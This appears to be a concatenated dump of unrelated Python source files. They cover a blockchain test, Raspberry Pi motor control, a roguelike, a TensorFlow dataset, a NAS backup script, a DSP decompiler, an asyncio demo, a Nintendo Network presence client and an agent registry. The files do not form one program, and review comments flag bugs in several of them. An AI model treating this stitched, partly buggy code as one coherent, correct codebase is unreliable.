        #self.dumppool(mempool)
        self.height = 1
        # create new block and save coinbase
        self.block1 = self.create_new_block()
        self.tip = self.block1.sha256
        self.height += 1
        # mature the block so we can spend the coinbase
        # NOTE(review): these blocks are solved locally and never submitted to
        # the node -- confirm whether a submitblock/generate was intended.
        for i in range(100):
            block = self.create_new_block()
            self.tip = block.sha256
            self.height += 1
        # sync pool not needed as long as we are using node 0 which has all the tx we sent to it
        # sync_mempools(self.nodes, wait=1, timeout=100)
        self.runs=[]
        for test_iteration in range(TEST_ITERATIONS):
            # do not use perf_counter. use timer from -printtoconsole instead
            gbt_start = time.perf_counter()
            # assemble a block and validate all tx in it
            templat = self.nodes[0].getblocktemplate()
            gbt_stop = time.perf_counter()
            # make sure all tx got mined
            assert(len(templat['transactions']) == CHAINED_TX)
            self.runs.append(gbt_stop - gbt_start)
        #assert(self.mempool_count() == 0)
        self.log.info('Mempool size {0}'.format(self.mempool_size))
        self.log.info('Send Tx took {0:.5f}s'.format(self.mempool_send))
        if len(self.runs) > 1:
            self.log.info('run times {}'.format(self.runs))
        self.log.info('GetBlkT took {0:.5f}s'.format(sum(self.runs)/len(self.runs)))
if __name__ == '__main__':
    # Entry point: run the framework's standard test harness.
    ChainedTest().main()
|
9,226 | a7cbd595b86908fb399bf11e1522588e0b0475c3 | from time import sleep
import RPi.GPIO as gpio
#GPIO.setmode(GPIO.BCM)
gpio.setwarnings(False)
def init():
    """Configure the four BCM motor-driver pins (26, 19, 13, 6) as outputs."""
    gpio.setmode(gpio.BCM)
    gpio.setup(26, gpio.OUT)
    gpio.setup(19, gpio.OUT)
    gpio.setup(13, gpio.OUT)
    gpio.setup(6, gpio.OUT)
def turn_left(tf):
    """Drive the left-turn pin pattern (26/13 low, 19/6 high) for tf seconds."""
    gpio.output(26, False)
    gpio.output(19, True)
    gpio.output(13, False)
    gpio.output(6, True)
    sleep(tf)
def turn_right(tf):
    """Drive the right-turn pin pattern (26/13 high, 19/6 low) for tf seconds."""
    gpio.output(26, True)
    gpio.output(19, False)
    gpio.output(13, True)
    gpio.output(6, False)
    sleep(tf)
def forward(tf):
    """Drive the forward pin pattern (26/6 high, 19/13 low) for tf seconds."""
    gpio.output(26, True)
    gpio.output(19, False)
    gpio.output(13, False)
    gpio.output(6, True)
    sleep(tf)
def reverse(tf):
    """Drive the reverse pin pattern (19/13 high, 26/6 low) for tf seconds."""
    gpio.output(26, False)
    gpio.output(19, True)
    gpio.output(13, True)
    gpio.output(6, False)
    sleep(tf)
def stop(tf):
    """De-energize all four pins, hold tf seconds, then release the GPIO.

    Note: gpio.cleanup() unconfigures the pins, so init() must be called
    again before any further motion (drive() does this on every call).
    """
    gpio.output(26, False)
    gpio.output(19, False)
    gpio.output(13, False)
    gpio.output(6, False)
    sleep(tf)
    gpio.cleanup()
def drive(direction, tym):
    """Execute one movement command, then brake.

    direction: one of 'forward', 'reverse', 'left', 'right', 'stop';
    any unrecognized value just stops.  tym: seconds per phase.
    """
    init()
    actions = {
        "forward": forward,
        "reverse": reverse,
        "left": turn_left,
        "right": turn_right,
    }
    action = actions.get(direction)
    if action is not None:
        action(tym)
    # Both the explicit 'stop' command and the fall-through end with a stop.
    stop(tym)
if __name__ == '__main__':
    # CLI usage: python <script> <direction> <seconds>
    import sys
    drive((sys.argv[1]), float(sys.argv[2]))
    gpio.cleanup()  # redundant second cleanup is harmless (warnings disabled above)
##
##init()
##forward(0.6)
##sleep(1)
##reverse(0.6)
##sleep(1)
##turn_right(0.6)
##sleep(1)
##turn_left(0.6)
##stop(1)
|
9,227 | 5f089c3e67452fe6d14f96a70d792bc0d056b375 | from . import utils
from . import objects
START = (0, 0)
STARTING_LIFE = 10
WHITE = (255, 255, 255)
class RoughLightGame:
    """Game state container: the map, the object list and the player.

    Fix applied: ``is_blocked`` was defined twice; the second definition
    silently replaced the first, so the duplicate has been removed.  Loop
    variables no longer shadow the builtin ``object``.
    """

    def __init__(self, game_map, width, height, **kwargs):
        self.map = game_map
        self.width = width
        self.height = height
        self.objects = kwargs.get('objects', list())
        self.start = kwargs.get('start', utils.Vector(0, 0))

        # player initialization: create a default player unless one was given
        self.player = kwargs.get('player', None)
        if not self.player:
            self.player = objects.Player(self.start, b'@', WHITE,
                                         self.map, STARTING_LIFE, fov=20)
        self.objects.append(self.player)

        # Add room labels ('a', 'b', ...) at each room's center.
        count = 0
        for room in self.map.rooms:
            label = objects.Object(room.get_center(), chr(ord('a') + count), WHITE, True, False)
            self.objects.append(label)
            count += 1

    def is_blocked(self, location):
        """Return True if the tile or any blocking object occupies *location*."""
        if self.map[location].blocks:
            return True
        return any(obj.blocks and obj.location == location for obj in self.objects)

    def visible_objects(self):
        """Return objects the player has seen that lie in the current view area.

        Returned in reverse insertion order so earlier objects draw on top.
        """
        res = []
        for obj in self.objects:
            if obj.visible and obj.location in self.player.seen:
                if self.map.in_area(self.width, self.height, obj.location, self.player.location):
                    res.append(obj)
        return reversed(res)

    def move_player(self, direction):
        """Move the player one step in *direction* unless the target is blocked."""
        if not self.is_blocked(self.player.location + direction):
            self.player.move(direction)

    def get_area(self, width, height):
        # Current viewport of the map, centered on the player.
        return self.map.get_area(width, height, self.player.location)
|
9,228 | f94fcf6ed54f247093050216c0c331ce188da919 | import tensorflow as tf
import tensorflow_io as tfio
import h5py
class GeneratorVGGNet():
    """Generator over an HDF5 archive yielding VGGNet training samples.

    Yields (left-eye image, head pose, gaze) tuples, or (left-eye, head)
    when *is_test* is true (the test split carries no gaze labels).
    """
    def __call__(self, filename, is_test):
        with h5py.File(filename, 'r') as archive:
            for group in list(archive.keys()):
                eyes = archive[str(group) + "/left-eye"]
                heads = archive[str(group) + "/head"]
                if is_test:
                    for eye, head in zip(eyes, heads):
                        yield (eye, head)
                else:
                    gazes = archive[str(group) + "/gaze"]
                    for eye, head, gaze in zip(eyes, heads, gazes):
                        yield (eye, head, gaze)
class Dataset():
    """Wraps a gaze-estimation HDF5 archive as a tf.data pipeline.

    Produces (left-eye image, head pose[, gaze]) element tuples; the gaze
    label is only present for training/testing data.
    """

    def __init__(self, config, path, batch_size, shuffle, is_training, is_testing):
        self.config = config
        self.is_training = is_training
        self.is_testing = is_testing
        self.path = path
        """
        each archive contains:
        face - a list 224x224 BGR images of type uint8
        eye-region - a list 224x60 BGR images of type uint8
        left-eye - a list 90x60 BGR images of type uint8
        right-eye - a list 90x60 BGR images of type uint8
        head - a list of 1x2 arrays. Each row contains the Euler angle representations of head orientation given in radians.
        face-landmarks - a list of 33x2 arrays. Each row contains the (u,v) coordinates of selected facial landmarks as found in the provided face image patches.
        gaze (except in test set) - a list of 1x2 arrays. Each row contains the Euler angle representations of gaze direction given in radians.
        """
        # Earlier generator-based pipeline, kept for reference:
        # if (self.config['model'] == 'vggnet'):
        #     if is_training or is_testing:
        #         self.data = tf.data.Dataset.from_generator(
        #             GeneratorVGGNet(),
        #             output_types = (tf.uint8, tf.float32, tf.float32),
        #             output_shapes = (tf.TensorShape([60,90,3]), tf.TensorShape([2]), tf.TensorShape([2])),
        #             args=(self.path, False)
        #         )
        #     else:
        #         self.data = tf.data.Dataset.from_generator(
        #             GeneratorVGGNet(),
        #             output_types = (tf.uint8, tf.float32),
        #             output_shapes = (tf.TensorShape([60,90,3]), tf.TensorShape([2])),
        #             args=(self.path, True)
        #         )
        # NOTE(review): the h5py handle is never closed, and only the FIRST
        # top-level group (keys[0]) is turned into a dataset -- concatenation
        # of the remaining groups is commented out below.  Confirm intended.
        hdf5 = h5py.File(self.path, 'r')
        keys = list(hdf5.keys())
        self.left_eye = tfio.IODataset.from_hdf5(self.path, '/' + str(keys[0]) + '/left-eye', spec=tf.uint8)
        self.head = tfio.IODataset.from_hdf5(self.path, '/' + str(keys[0]) + '/head', spec=tf.float64)
        if is_training or is_testing:
            self.gaze = tfio.IODataset.from_hdf5(self.path, '/' + str(keys[0]) + '/gaze', spec=tf.float64)
        # for key in keys[1:]:
        #     temp = tfio.IODataset.from_hdf5(self.path, '/' + str(key) + '/left-eye', spec=tf.uint8)
        #     self.left_eye = self.left_eye.concatenate(temp)
        #     temp = tfio.IODataset.from_hdf5(self.path, '/' + str(key) + '/head', spec=tf.float64)
        #     self.head = self.head.concatenate(temp)
        #     if is_training or is_testing:
        #         temp = tfio.IODataset.from_hdf5(self.path, '/' + str(key) + '/gaze', spec=tf.float64)
        #         self.gaze = self.gaze.concatenate(temp)
        if is_testing or is_training:
            self.data = tf.data.Dataset.zip((self.left_eye, self.head, self.gaze))
        else:
            self.data = tf.data.Dataset.zip((self.left_eye, self.head))
        self.batch_size = batch_size
        self.shuffle = shuffle  # shuffle buffer size (int), not a boolean

    def get_data(self):
        """ Method used to generate and preprocess tensorflow datasets for training and test data and validation data"""
        if self.config['model'] == 'vggnet':
            if self.is_training:
                # Training: shuffle with the configured buffer before batching.
                return self.data.shuffle(self.shuffle).batch(self.batch_size)
            elif self.is_testing:
                return self.data.batch(self.batch_size)
            elif not self.is_testing and not self.is_training:
                # Validation: plain batching, no shuffling.
                return self.data.batch(self.batch_size)
        else:
            raise NotImplementedError('In dataset.py: default input not specified for this model!')
|
9,229 | b6dd04219de1d4526d175254da539107362772d6 | #!/usr/bin/python
import os
def main():
    """Run the weekly home-directory backup to the NAS over Samba."""
    # Desktop notification: backup starting.
    os.system("notify-send 'Backup' 'NAS Backup Starting...' -i /usr/share/pixmaps/xarchiver/xarchiver-extract.png ")
    # Mount the NAS share, mirror the home directory (deleting stale files;
    # keeps shell profiles, skips other dotfiles, VMs and BurpSuite), unmount.
    os.system("sudo mount -o username='emre' //192.168.1.2/Samba /media/NAS")
    os.system("sudo rsync -av --include='.profile' --include='.bash*' --exclude='.*' --exclude='VirtualBox*' --exclude='BurpSuite*' --delete /home/monster /media/NAS")
    os.system("sudo umount /media/NAS")
    # Send the notification e-mail via a companion script.
    os.system("python /home/monster/Scripts/emre-mailclient-weeklybackup.py")
    # Desktop notification plus completion sound.
    os.system("notify-send 'Backup' 'NAS Backup Completed!' -i /usr/share/pixmaps/xarchiver/xarchiver-add.png & paplay /usr/share/sounds/KDE-Im-User-Auth.ogg")
main()
|
9,230 | fcb1285648f6728e3dad31ad4b602fa4e5c5b422 | from datetime import datetime
from app.commands import backfill_performance_platform_totals, backfill_processing_time
# This test assumes the local timezone is EST
def test_backfill_processing_time_works_for_correct_dates(mocker, notify_api):
    """Backfilling 1-3 Aug sends processing time once per local day.

    Bug fix: the three assertions previously all checked the same
    (Aug 3 -> Aug 4) window, so two of the three expected calls were never
    actually verified.  They now cover each day in the range, mirroring the
    totals test below.  Local midnights are expressed in UTC (EDT = UTC-4).
    """
    send_mock = mocker.patch("app.commands.send_processing_time_for_start_and_end")

    # backfill_processing_time is a click.Command object - if you try invoking the callback on its own, it
    # throws a `RuntimeError: There is no active click context.` - so get at the original function using __wrapped__
    backfill_processing_time.callback.__wrapped__(datetime(2017, 8, 1), datetime(2017, 8, 3))

    assert send_mock.call_count == 3
    send_mock.assert_any_call(datetime(2017, 8, 1, 4, 0), datetime(2017, 8, 2, 4, 0))
    send_mock.assert_any_call(datetime(2017, 8, 2, 4, 0), datetime(2017, 8, 3, 4, 0))
    send_mock.assert_any_call(datetime(2017, 8, 3, 4, 0), datetime(2017, 8, 4, 4, 0))
def test_backfill_totals_works_for_correct_dates(mocker, notify_api):
    """Backfilling totals for 1-3 Aug uploads once per day in the range."""
    send_mock = mocker.patch("app.commands.send_total_sent_notifications_to_performance_platform")

    # The command is a click.Command; invoking its callback directly raises
    # "RuntimeError: There is no active click context", so unwrap the original
    # function via __wrapped__ instead.
    backfill_performance_platform_totals.callback.__wrapped__(datetime(2017, 8, 1), datetime(2017, 8, 3))

    assert send_mock.call_count == 3
    for day in (1, 2, 3):
        send_mock.assert_any_call(datetime(2017, 8, day))
|
9,231 | 865d7c606b287dbce158f721c6cf768cd078eb48 | import collections
import inspect
import struct
from pygments.token import *
import decompil.builder
import decompil.disassemblers
import decompil.ir
class Context(decompil.ir.Context):
    """IR context for the GameCube DSP: a 16-bit machine with composite registers."""

    def __init__(self):
        super(Context, self).__init__(16)
        self.pointer_type = self.create_pointer_type(self.half_type)
        self.init_registers()

    def init_registers(self):
        """Create the DSP register file, including composite accumulator views."""
        # The flat 16-bit register file, indexed by hardware register number.
        self.registers = regs = [
            # 0x00-0x03
            Register(self, 'ar0', 16),
            Register(self, 'ar1', 16),
            Register(self, 'ar2', 16),
            Register(self, 'ar3', 16),
            # 0x04-0x07
            Register(self, 'ix0', 16),
            Register(self, 'ix1', 16),
            Register(self, 'ix2', 16),
            Register(self, 'ix3', 16),
            # 0x08-0xb
            Register(self, 'r08', 16),
            Register(self, 'r09', 16),
            Register(self, 'r0a', 16),
            Register(self, 'r0b', 16),
            # 0x0c-0x0f
            # TODO: something special?
            Register(self, 'st0', 16),
            Register(self, 'st1', 16),
            Register(self, 'st2', 16),
            Register(self, 'st3', 16),
            # 0x10-0x11
            # TODO: handle 8-bit overflow
            Register(self, 'ac0.h', 16),
            Register(self, 'ac1.h', 16),
            # 0x12-0x13
            Register(self, 'config', 16),
            Register(self, 'sr', 16),
            # 0x14-0x17
            Register(self, 'prod.l', 16),
            Register(self, 'prod.m1', 16),
            # TODO: handle 8-bit overflow
            Register(self, 'prod.h', 16),
            Register(self, 'prod.m2', 16),
            # 0x18-0x1b
            Register(self, 'ax0.l', 16),
            Register(self, 'ax1.l', 16),
            Register(self, 'ax0.h', 16),
            Register(self, 'ax1.h', 16),
            # 0x1c-0x1f
            Register(self, 'ac0.l', 16),
            Register(self, 'ac1.l', 16),
            Register(self, 'ac0.m', 16),
            Register(self, 'ac1.m', 16),
        ]
        # Four wr registers, paired 1:1 with ar0-ar3 via addr_to_wr below.
        self.wr_registers = [
            Register(self, 'wr{}'.format(i), 16) for i in range(4)
        ]
        self.addr_to_wr = {
            self.registers[0x00]: self.wr_registers[0x00],
            self.registers[0x01]: self.wr_registers[0x01],
            self.registers[0x02]: self.wr_registers[0x02],
            self.registers[0x03]: self.wr_registers[0x03],
        }
        # Map each addressing register ar0-ar3 to its index register ix0-ix3.
        self.addr_to_ix = {
            self.registers[0x00]: self.registers[0x04],
            self.registers[0x01]: self.registers[0x05],
            self.registers[0x02]: self.registers[0x06],
            self.registers[0x03]: self.registers[0x07],
        }
        # 40-bit accumulators composed of their h/m/l component registers.
        self.long_accumulators = [
            Register(self, 'ac0', 40, [
                (regs[0x10], 32), (regs[0x1e], 16), (regs[0x1c], 0)
            ]),
            Register(self, 'ac1', 40, [
                (regs[0x11], 32), (regs[0x1f], 16), (regs[0x1d], 0)
            ]),
        ]
        # 24-bit short views (high + middle parts only).
        self.short_accumulators = [
            Register(self, 'acs0', 24, [(regs[0x10], 16), (regs[0x1e], 0)]),
            Register(self, 'acs1', 24, [(regs[0x11], 16), (regs[0x1f], 0)]),
        ]
        # 32-bit extra accumulators ax0/ax1 from their h/l halves.
        self.extra_acculumators = [
            Register(self, 'ax0', 32, [(regs[0x1a], 16), (regs[0x18], 0)]),
            Register(self, 'ax1', 32, [(regs[0x1b], 16), (regs[0x19], 0)]),
        ]
        # 40-bit product register; note prod.m1 and prod.m2 both sit at bit 16.
        self.prod_register = Register(self, 'prod', 40, [
            (regs[0x17], 16),
            (regs[0x16], 32),
            (regs[0x15], 16),
            (regs[0x14], 0),
        ])
class Register(decompil.ir.Register):
    """A DSP register, possibly composed of several narrower hardware registers.

    ``components`` is a list of (register, bit-shift) pairs describing where
    each sub-register sits inside the composite value (e.g. prod, ac0).
    """

    def __init__(self, context, name, width, components=None):
        self.context = context
        self.type = context.create_int_type(width)
        self.name = name
        self.components = components
        # Convenience list of just the sub-registers (None for plain registers).
        self.registers = (
            [reg for reg, _ in components]
            if components else
            None
        )

    def build_load(self, builder):
        """Emit IR reading the full register value."""
        if self.components is None:
            return builder.build_rload(self)
        else:
            # Zero-extend each component, shift it into position, and sum.
            result = None
            for reg, shift in self.components:
                val = builder.build_zext(
                    self.type, builder.build_rload(reg)
                )
                if shift:
                    val = builder.build_lshl(val, self.type.create(shift))
                if result:
                    result = builder.build_add(result, val)
                else:
                    result = val
            return result

    def build_store(self, builder, value):
        """Emit IR writing *value* into the register (or its components)."""
        assert value.type == self.type
        if self.components is None:
            builder.build_rstore(self, value)
        else:
            # NOTE(review): for shift != 0 this LEFT-shifts the value before
            # truncating, and for shift == 0 it reuses `val` from the previous
            # iteration; extracting a high component would normally need a
            # RIGHT shift.  Confirm against the builder's shift semantics.
            for reg, shift in self.components:
                if shift:
                    val = builder.build_lshl(value, value.type.create(shift))
                val = builder.build_trunc(reg.type, val)
                builder.build_rstore(reg, val)

    def build_load_comp(self, builder):
        # Load each component register separately (no recombination).
        return [
            builder.build_rload(reg)
            for reg, _ in self.components
        ]

    def build_store_comp(self, builder, *values):
        # Store one value per component, in declaration order.
        assert len(values) == len(self.components)
        for value, (reg, _) in zip(values, self.components):
            builder.build_rstore(reg, value)

    def format(self):
        # Pygments token stream: registers render as '$name'.
        return [(Name.Variable, '${}'.format(self.name))]
class BaseDecoder:
    """Common interface shared by instruction and extension decoders.

    Subclasses define the opcode pattern/mask and an operand table, and
    implement ``decode`` to emit IR for the instruction.
    """

    # Opcode-specific subclasses override these class attributes.
    name = None
    opcode = None
    opcode_mask = None
    operands_format = None

    def decode(self, context, disassembler, builder):
        """Emit IR for this instruction; must be overridden."""
        raise NotImplementedError()

    def decode_operands(self, context):
        """Extract each operand described by ``operands_format``."""
        operands = []
        for fmt in self.operands_format:
            operands.append(fmt.extract(context, self))
        return operands
class Instruction(BaseDecoder):
    """A decoded DSP instruction, optionally with an extra word and extension."""

    # Opcode-specific subclasses override these flags.
    have_extra_operand = False
    is_extended = False

    def __init__(self, address, opcode, extra_operand=None, extension=None):
        self.address = address
        self.opcode_value = opcode
        self.extension = extension
        # The class-level flags must agree with what was actually passed in.
        assert self.is_extended == (extension is not None)
        assert self.have_extra_operand == (extra_operand is not None)
        self.extra_operand = extra_operand
        # Give the extension a back-reference to its owning instruction.
        if self.extension:
            self.extension.instruction = self

    def __repr__(self):
        suffix = ' ({})'.format(self.extension.name) if self.extension else ''
        return '{:04x}: {}{}'.format(self.address, self.name, suffix)
class InstructionExtension(BaseDecoder):
    """Decoder for the extension part encoded in an extended instruction."""

    def __init__(self, opcode):
        self.opcode_value = opcode
        # When accepting an extension, instructions should set the following
        # field:
        self.instruction = None

    def __repr__(self):
        # NOTE(review): `self.address` is never assigned on extensions (the
        # owning Instruction holds the address), so this repr raises
        # AttributeError; it likely meant self.instruction.address.
        return '{:04x}: {} (extension)'.format(
            self.address, self.name
        )
# Registries of decoder classes, populated from gcdsp.decoders below.
instructions = []
instruction_extensions = []


def _init_tables():
    """Collect every Instruction/InstructionExtension subclass from gcdsp.decoders."""
    import gcdsp.decoders

    def helper(table, cls):
        for obj_name in dir(gcdsp.decoders):
            obj = getattr(gcdsp.decoders, obj_name)
            # Keep strict subclasses only (skip non-classes and the base itself).
            if not (
                inspect.isclass(obj)
                and issubclass(obj, cls)
                and obj != cls
            ):
                continue
            # An opcode pattern must only set bits covered by its mask.
            assert (obj.opcode & ~obj.opcode_mask) == 0
            table.append(obj)

    helper(instructions, Instruction)
    helper(instruction_extensions, InstructionExtension)


_init_tables()
def load_insns():
    """Populate the decoder tables from the opcode lists in gcdsp.decoders.

    For every entry in ``opcodes``/``opcodes_ext`` a decoder class is built
    dynamically.  Its ``decode`` callback is looked up as ``decode_<name>``
    in gcdsp.decoders, falling back to a stub that emits an undefined op.
    """
    import gcdsp.decoders

    def default_decoder(self, context, disassembler, builder):
        # Unknown semantics: mark as undefined and end the basic block.
        builder.build_undef()
        disassembler.stop_basic_block()

    def decode_operands(self, context):
        # Extract each operand field from the instruction word: mask the
        # bits, shift them down, then apply the table's addend.
        result = []
        for _, size, addend, rshift, mask in self.operands_format:
            # Fixed: the original appended `self.opcode & mask + addend`,
            # which parses as `self.opcode & (mask + addend)` and ignored the
            # computed `operand`; it also read the class-level opcode pattern
            # instead of the decoded word (opcode_value).
            operand = (self.opcode_value & mask) >> rshift
            result.append(operand + addend)
        return result

    Insn = collections.namedtuple(
        'Insn', 'name opcode mask size unused0 operands is_extended unused1'
    )

    for insn in gcdsp.decoders.opcodes:
        insn = Insn(*insn)
        insn_decoder = getattr(
            gcdsp.decoders,
            'decode_{}'.format(insn.name.lower()),
            default_decoder,
        )
        instructions.append(
            type(insn.name, (Instruction, ), {
                'name': insn.name,
                'opcode': insn.opcode,
                'opcode_mask': insn.mask,
                'have_extra_operand': insn.size == 2,
                'is_extended': insn.is_extended,
                'decode': insn_decoder,
                'decode_operands': decode_operands,
                'operands_format': insn.operands
            })
        )

    for ext in gcdsp.decoders.opcodes_ext:
        ext = Insn(*ext)
        # Fixed: the original reused `insn_decoder` and `insn.operands` left
        # over from the loop above, wiring every extension to the LAST plain
        # instruction's decoder and operand table.
        ext_decoder = getattr(
            gcdsp.decoders,
            'decode_{}'.format(ext.name.lower()),
            default_decoder,
        )
        instruction_extensions.append(
            type(ext.name, (InstructionExtension, ), {
                'name': ext.name,
                'opcode': ext.opcode,
                'opcode_mask': ext.mask,
                'decode': ext_decoder,
                'decode_operands': decode_operands,
                'operands_format': ext.operands
            })
        )


load_insns()
class Decoder(decompil.disassemblers.BaseDecoder):
    """Reads big-endian 16-bit words from a file and decodes DSP instructions."""

    def __init__(self, fp):
        # fp: binary file object; get_word() seeks absolutely, so any
        # starting position is fine.
        self.fp = fp

    def parse_insn(self, disassembler, builder, address):
        """Decode one instruction at *address* (a word offset).

        Emits IR via *builder* and returns the next instruction's address,
        or None at end of input.
        """
        opcode = self.get_word(address)
        next_address = address + 1
        if opcode is None:
            return None
        insn_pat = self.lookup(opcode, instructions)

        # Parse the extra operand, if any.
        if insn_pat.have_extra_operand:
            extra_operand = self.get_word(address + 1)
            next_address += 1
            if extra_operand is None:
                raise ValueError('Incomplete file')
        else:
            extra_operand = None

        # Parse the instruction extension, if any (same word, different mask).
        if insn_pat.is_extended:
            ext_pat = self.lookup(opcode, instruction_extensions)
            ext = ext_pat(opcode)
        else:
            ext = None

        insn = insn_pat(address, opcode, extra_operand, ext)
        # Human-readable tag, e.g. "ADD'MV", attached to the emitted IR.
        insn_image = '{}{}'.format(
            insn.name,
            "'{}".format(insn.extension.name) if insn.is_extended else ''
        )
        builder.set_origin('At {:#04x}: {}'.format(address, insn_image))

        # Always decode the extension first (if any).
        if insn.is_extended:
            insn.extension.decode(disassembler.context, disassembler, builder)
            # TODO: remove this once all extensions are supported.
            if disassembler.must_stop_basic_block:
                return next_address

        insn.decode(disassembler.context, disassembler, builder)
        return next_address

    def iter_insns(self, address):
        # NOTE(review): parse_insn returns a single address (or None), but
        # this loop unpacks two values -- it would raise TypeError if called.
        while True:
            address, insn = self.parse_insn(address)
            if insn is None:
                break
            else:
                yield address, insn

    def get_word(self, address):
        """Return the big-endian 16-bit word at *address*, or None at EOF."""
        self.fp.seek(2 * address)
        word = self.fp.read(2)
        if len(word) == 0:
            return None
        elif len(word) == 2:
            return struct.unpack('>H', word)[0]
        else:
            # A single trailing byte means the file was truncated mid-word.
            raise ValueError('Incomplete file')

    def lookup(self, opcode, pattern_set):
        """Return the first pattern whose masked bits match *opcode*."""
        for pat in pattern_set:
            if opcode & pat.opcode_mask == pat.opcode:
                return pat
        else:
            raise ValueError('Invalid opcode: {:04x}'.format(opcode))
|
9,232 | e838a52fecbf69719acc6de38b5f045e792e1408 | print("Hi Tom") |
9,233 | e1172e2d9f20e56241829b3e4ccb4bcf6b5440be | #!usr/bin/python
# -*- coding:utf8 -*-
import time
import random
import asyncio
async def consumer(queue, name):
    """Forever pull values from *queue*, logging each one; never returns."""
    while True:
        val = await queue.get()
        print(f'{name} get a val: {val} at {time.strftime("%X")}')
        await asyncio.sleep(1)  # simulate one second of processing per item
async def producer(queue, name):
    """Push the integers 0..19 onto *queue*, pausing 0.1s between puts."""
    for item in range(20):
        await queue.put(item)
        print(f'{name} put a val: {item}')
        await asyncio.sleep(0.1)
async def main():
    """Wire one producer to three consumers over a shared queue.

    NOTE(review): the consumers loop forever, so gather() never completes
    and this coroutine only ends when the process is interrupted.
    """
    queue = asyncio.Queue()
    tasks = [asyncio.create_task(producer(queue, 'producer'))]
    for i in range(3):
        tasks.append(asyncio.create_task(consumer(queue, f'consumer_{i}')))
    # await asyncio.sleep(10)
    await asyncio.gather(*tasks, return_exceptions=True)
# start = time.perf_counter()
asyncio.run(main())  # runs until interrupted: the consumers never exit
# end = time.perf_counter()
# print(end - start)
|
9,234 | 43315abf9e096cdca89ed7f4de976d2706ff9c20 |
from nintendo.nex import backend, authentication, friends, matchmaking, common
from nintendo.account import AccountAPI
from nintendo.games import MK8, Friends
import struct
import logging
logging.basicConfig(level=logging.INFO)
# Device id can be retrieved with a call to MCP_GetDeviceId on the Wii U
# Serial number can be found on the back of the Wii U
DEVICE_ID = 12345678
SERIAL_NUMBER = "..."    # placeholder: fill in before running
SYSTEM_VERSION = 0x220
REGION = 4 #EUR
COUNTRY = "NL"
USERNAME = "..." #Nintendo network id (placeholder)
PASSWORD = "..." #Nintendo network password (placeholder)
#This function logs in on a game server
def backend_login(title, use_auth_info, use_login_data, settings=None):
    """Log in on a game server and return a connected BackEndClient.

    title: game definition (title ids, access key, server id/version).
    use_auth_info / use_login_data: which credential container this
    particular server expects to receive at login.
    settings: optional backend settings passed to BackEndClient.
    """
    api.set_title(title.TITLE_ID_EUR, title.LATEST_VERSION)
    nex_token = api.get_nex_token(title.GAME_SERVER_ID)

    auth_info = None
    login_data = None
    if use_auth_info:
        auth_info = authentication.AuthenticationInfo()
        auth_info.token = nex_token.token
        auth_info.server_version = title.SERVER_VERSION
    if use_login_data:
        login_data = authentication.NintendoLoginData()
        login_data.token = nex_token.token

    client = backend.BackEndClient(settings)
    # Fixed: was `clietn.configure(...)`, a typo that raised NameError.
    client.configure(title.ACCESS_KEY, title.NEX_VERSION)
    client.connect(nex_token.host, nex_token.port)
    client.login(
        nex_token.username, nex_token.password, auth_info, login_data
    )
    return client
# Authenticate against the Nintendo account service with the console identity.
api = AccountAPI()
api.set_device(DEVICE_ID, SERIAL_NUMBER, SYSTEM_VERSION, REGION, COUNTRY)
api.login(USERNAME, PASSWORD)

# Connect to both the Mario Kart 8 server and the Wii U friends server
friends_backend = backend_login(
    Friends, False, True, "friends.cfg"
)
game_backend = backend_login(MK8, True, False)
pid = game_backend.get_pid()

friends_client = friends.FriendsClient(friends_backend.secure_client)
matchmaker = matchmaking.MatchmakeExtensionClient(game_backend.secure_client)

# Create a matchmake session: a friends-only room for 2-12 players.
matchmake_session = matchmaking.MatchmakeSession()
matchmake_session.player_min = 2
matchmake_session.player_max = 12
matchmake_session.participation_policy = 98
matchmake_session.game_mode = 3
matchmake_session.attribs[4] = 0x403 #DLCs enabled
matchmake_session.matchmake_system = matchmaking.MatchmakeSystem.FRIENDS
session_id = matchmaker.create_matchmake_session(
    matchmake_session, "", 1
).gid

# Tell friends we're playing MK8 and have created a room.
# NOTE(review): the blob layout is undocumented here; the pid is packed
# little-endian at offset 13 -- confirm against the friends protocol before
# changing any byte of it.
application_data = b"\0\0\x20\x03\0\0\0\0\0\0\0\0\x18" + struct.pack("<I", pid) + b"\0\0\0"

presence = friends.NintendoPresenceV2()
presence.flags = 0x1EE
presence.is_online = True
presence.game_key.title_id = MK8.TITLE_ID_EUR
presence.game_key.title_version = MK8.LATEST_VERSION
presence.message = "I'm a Python client"
presence.unk2 = 2
presence.unk3 = 2
presence.game_server_id = MK8.GAME_SERVER_ID
presence.unk4 = 3
presence.pid = pid
presence.gathering_id = session_id
presence.application_data = application_data
friends_client.update_presence(presence)

input("Press enter to disconnect and exit\n")

# Tell friends we've gone offline (an empty presence object clears status).
presence = friends.NintendoPresenceV2()
friends_client.update_presence(presence)

# Disconnect from servers
game_backend.close()
friends_backend.close()
|
9,235 | b77c40c89c88b49c851e9a14c67cf0799d6de847 | # Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from smarts.core.utils.class_factory import ClassRegister
agent_registry = ClassRegister()
def register(locator: str, entry_point, **kwargs):
    """Register an AgentSpec with the zoo.

    In order to load a registered AgentSpec it needs to be reachable from a
    directory contained in the PYTHONPATH.

    Args:
        locator: A string in the format of 'locator-name'.
        entry_point: A callable that returns an AgentSpec, or an AgentSpec
            object itself.
        kwargs: Extra arguments stored with the registration.
    """
    agent_registry.register(name=locator, entry_point=entry_point, **kwargs)
def make(locator: str, **kwargs):
    """Create an AgentSpec from the given locator.

    In order to load a registered AgentSpec it needs to be reachable from a
    directory contained in the PYTHONPATH.

    Args:
        locator: 'path.to.file:locator-name' where the path is in the form
            `{PYTHONPATH}[n]/path/to/file.py`.
